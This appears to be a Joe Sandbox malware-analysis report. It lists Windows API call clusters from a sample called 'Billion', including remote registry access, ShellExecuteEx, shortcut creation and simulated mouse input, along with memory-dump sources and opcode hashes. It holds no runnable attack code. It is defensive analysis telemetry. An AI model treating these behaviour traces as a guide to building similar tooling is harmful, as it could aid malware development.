                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00166786
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1414292761-0
APIs
  • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
  • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
  • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
  • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
  • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC72A
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001BC785
• RegCloseKey.ADVAPI32(00000000), ref: 001BC7CA
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001BC7F9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 001BC853
• RegCloseKey.ADVAPI32(?), ref: 001BC85F
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
APIs
• VariantInit.OLEAUT32(00000035), ref: 001900A9
• SysAllocString.OLEAUT32(00000000), ref: 00190150
• VariantCopy.OLEAUT32(00190354,00000000), ref: 00190179
• VariantClear.OLEAUT32(00190354), ref: 0019019D
• VariantCopy.OLEAUT32(00190354,00000000), ref: 001901A1
• VariantClear.OLEAUT32(?), ref: 001901AB
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
APIs
  • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
  • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
• GetOpenFileNameW.COMDLG32(00000058), ref: 001A9F2A
• _wcslen.LIBCMT ref: 001A9F4B
• _wcslen.LIBCMT ref: 001A9F72
• GetSaveFileNameW.COMDLG32(00000058), ref: 001A9FCA
Strings
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A6F21
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001A707E
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(001D0CC4,00000000,00000001,001D0B34,?), ref: 001A7095
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001A7319
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                                                                                                                                          • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3cb20f0dc753a1c3bf089c0d51f0ad3c08fbc07a9b8b26d50a15ec0f9848b16c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 56aab2942a21548f34d17cdbc9facf0623e7322d2141be7e9d04536d8da5f942
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cb20f0dc753a1c3bf089c0d51f0ad3c08fbc07a9b8b26d50a15ec0f9848b16c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9D13A71508301AFD304EF24C881E6BB7E8FF99708F40496DF5958B2A2DB71EA45CB92
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 001A11B3
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001A11EE
                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 001A120A
                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 001A1283
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001A129A
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 001A12C8
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b037fdf91ff088e49a60ce18790e5393adc364b80adca4dde732bcc86eb27f7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 682edf49083c63fc06aff201b3abf4b21fa0b202f3c99a9abbe548b2a24cee97
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b037fdf91ff088e49a60ce18790e5393adc364b80adca4dde732bcc86eb27f7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC416D75900204EFDF05AFA4DCC5AAAB7B8FF09310F1440A5ED009E296D730DE55DBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0018FBEF,00000000,?,?,00000000,?,001739E2,00000004,00000000,00000000), ref: 001C8CA7
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 001C8CCD
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001C8D2C
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 001C8D40
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 001C8D66
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001C8D8A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5efee64d9d6022de44c418b69e2ef9852112a6e4a140ecb78264ba89734259b4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1425efdc745b77cf332ccdbe35077c94b0f71506b03ed5e514a4193dfed0b3ef
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5efee64d9d6022de44c418b69e2ef9852112a6e4a140ecb78264ba89734259b4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB417130601248EFDB25DF64E8CDFA57BE1FB65308F1540AEE5194B2A2CB31E849CB55
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 001B2D45
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001AEF33: GetWindowRect.USER32(?,?), ref: 001AEF4B
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001B2D6F
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001B2D76
                                                                                                                                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001B2DB2
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001B2DDE
                                                                                                                                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001B2E3C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2387181109-0
APIs
• IsWindowVisible.USER32(?), ref: 001955F9
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00195616
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0019564E
• _wcslen.LIBCMT ref: 0019566C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00195674
• _wcsstr.LIBVCRUNTIME ref: 0019567E
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0
APIs
  • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
• _wcslen.LIBCMT ref: 001A62C0
• CoInitialize.OLE32(00000000), ref: 001A63DA
• CoCreateInstance.OLE32(001D0CC4,00000000,00000001,001D0B34,?), ref: 001A63F3
• CoUninitialize.OLE32 ref: 001A6411
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
APIs
• GetLastError.KERNEL32(?,?,001536E9,00153355), ref: 00153700
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0015370E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00153727
• SetLastError.KERNEL32(00000000,?,001536E9,00153355), ref: 00153779
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,00000000,00154D53,00000000,?,?,001568E2,?,?,00000000), ref: 001630EB
• _free.LIBCMT ref: 0016311E
• _free.LIBCMT ref: 00163146
• SetLastError.KERNEL32(00000000,?,00000000), ref: 00163153
• SetLastError.KERNEL32(00000000,?,00000000), ref: 0016315F
• _abort.LIBCMT ref: 00163165
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: cd5c8e90ba57b8f45e13dc2f5fef61f4e9ea7a3a728cce2e165aa1ba2368cc9d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 544b8bd2f4cb746249f1fac0d5d32423aad0c82ea054c712d9d1c9c993c680ff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd5c8e90ba57b8f45e13dc2f5fef61f4e9ea7a3a728cce2e165aa1ba2368cc9d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDF0FCB6504A0127C2123739BC0AE6E166AAFE3771B270424F934D22D1EF34CE729161
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00131F87
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131F96
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: BeginPath.GDI32(?), ref: 00131FAD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131FD6
                                                                                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001C94AA
                                                                                                                                                                                                                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 001C94BE
                                                                                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001C94CC
                                                                                                                                                                                                                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 001C94DC
                                                                                                                                                                                                                                                                                                          • EndPath.GDI32(?), ref: 001C94EC
                                                                                                                                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 001C94FC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0a90aa616abb41ceca9250a95318dda5c0b6e3ef62f7c11d95b8d58dbdb728ec
                                                                                                                                                                                                                                                                                                          • Instruction ID: 75eedbfe58c16c6f92028095cd5a88a030d873ba386c3c58412bde4608bb179d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a90aa616abb41ceca9250a95318dda5c0b6e3ef62f7c11d95b8d58dbdb728ec
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7111B7600010DBFDF029F94EC88E9A7F6DEF08360F048026BA195A561C771DDA5DBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001332AF
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 001332B7
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001332C2
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001332CD
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 001332D5
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 001332DD
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 68184e1d36aff828deaffbd81cb1b3e5d11036714d1eae508608369e3a0a049a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d52ff4edc4ed0a29df4b9a5cece6c43bbfdaaee5f04f0fdcbf0b893e5904d12
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68184e1d36aff828deaffbd81cb1b3e5d11036714d1eae508608369e3a0a049a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 930167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?), ref: 001734EF
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00173506
                                                                                                                                                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 00173512
                                                                                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00173521
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00173533
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0017354D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 62f8715dfce7d9db511e5b9ebc6210e000b529fe4b230aaf9364e0766a253872
                                                                                                                                                                                                                                                                                                          • Instruction ID: 36dc2918820484311e9fb088d26ad3e27f4831aaa2e2257d1bf014b15df2db68
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62f8715dfce7d9db511e5b9ebc6210e000b529fe4b230aaf9364e0766a253872
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C012431600215EFDB505BA4EC08FEABFB1FB08321F514170FA2AA25A1CB315E92AB10
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001921CC
                                                                                                                                                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 001921D8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001921E1
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001921E9
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001921F2
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001921F9
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0013D253
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: t5 $t5 $t5 $`
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-3168467761
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 001BB903
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 001BB998
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BB9C7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00197B6D
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00197BA3
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00197BB4
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00197C36
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001C48D1
                                                                                                                                                                                                                                                                                                          • IsMenu.USER32(?), ref: 001C48E6
                                                                                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001C492E
                                                                                                                                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 001C4941
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001927B3
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001927C6
